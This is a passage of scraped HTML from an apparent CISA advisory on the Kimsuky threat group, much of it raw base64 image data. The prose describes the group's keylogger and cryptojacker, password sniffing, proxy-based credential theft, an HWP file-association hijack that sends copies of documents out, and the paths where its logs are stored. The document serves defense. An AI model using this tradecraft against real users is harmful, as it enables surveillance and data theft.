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" style="width: 482px; height: 368px;" /></font></font></p> <p class="text-align-center" style="margin-top: 8px; margin-bottom: 13px;"><em>Figure 3: JavaScript file, named <code>jQuery.js</code></em> [<a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">52</a>]</p> <ul> <li>Kimsuky also uses a PowerShell based keylogger, named MECHANICAL, and a network sniffing tool, named Nirsoft SniffPass (<em>Input Capture: Keylogging</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1056/001/">T1056.001</a>], <em>Network Sniffing</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1040/">T1040</a>]). MECHANICAL logs keystrokes to <code>%userprofile%\appdata\roaming\apach.{txt,log}</code> and is also a "cryptojacker," which is a tool that uses a victim’s computer to mine cryptocurrency. Nirsoft SniffPass is capable of obtaining passwords sent over non-secure protocols.[<a href="https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia">53</a>]</li> <li>Kimsuky used actor-modified versions of PHProxy, an open-source web proxy written in PHP, to examine web traffic between the victim and the website accessed by the victims and to collect any credentials entered by the victim.[54]</li> </ul> <h4 style="margin-top: 8px; margin-bottom: 8px;">Discovery</h4> <p>Kimsuky enumerates system information and the file structure for victims’ computers and networks (<em>Discovery</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0007/">TA0007</a>]). Kimsuky appears to rely on using the victim’s operating system command prompt to enumerate the file structure and system information (<em>File and Directory Discovery </em>[<a href="https://attack.mitre.org/versions/v7/techniques/T1083/">T1083</a>]). The information is directed to <code>C:\WINDOWS\msdatl3.inc</code>, read by malware, and likely emailed to the malware’s command server.[<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">55</a>]</p> <h4 style="margin-top: 8px; margin-bottom: 8px;">Collection</h4> <p>Kimsuky collects data from the victim system through its HWP document malware and its keylogger (<em>Collection</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0009/">TA0009</a>]). The HWP document malware changes the default program association in the Registry to open HWP documents (<em>Event Triggered Execution: Change Default File Association</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1546/001/">T1546.001</a>]). When a user opens an HWP file, the Registry key change triggers the execution of malware that opens the HWP document and then sends a copy of the HWP document to an account under the adversary’s control. The malware then allows the user to open the file as normal without any indication to the user that anything has occurred. The keylogger intercepts keystrokes and writes them to <code>C:\Program Files\Common Files\System\Ole DB\msolui80.inc</code> and records the active window name where the user pressed keys (<em>Input Capture: Keylogging</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1056/001/">T1056.001</a>]). There is another keylogger variant that logs keystrokes into <code>C:\WINDOWS\setup.log</code>.[<a href="https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/">56</a>]</p> <p>Kimsuky has also used a Mac OS Python implant that gathers data from Mac OS systems and sends it to a C2 server (<em>Command and Scripting Interpreter: Python</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1059/006/">T1059.006]</a>). The Python program downloads various implants based on C2 options specified after the <code>filedown.php</code> (see figure 4).</p> <p align="center" style="text-align: center; margin-bottom: 8px;"><span style="page-break-after: avoid;"><font color="#000000"><font face="Times New Roman"><img alt="" data-entity-type="" data-entity-uuid="" src="https://us-cert.cisa.govdata:image/png;base64,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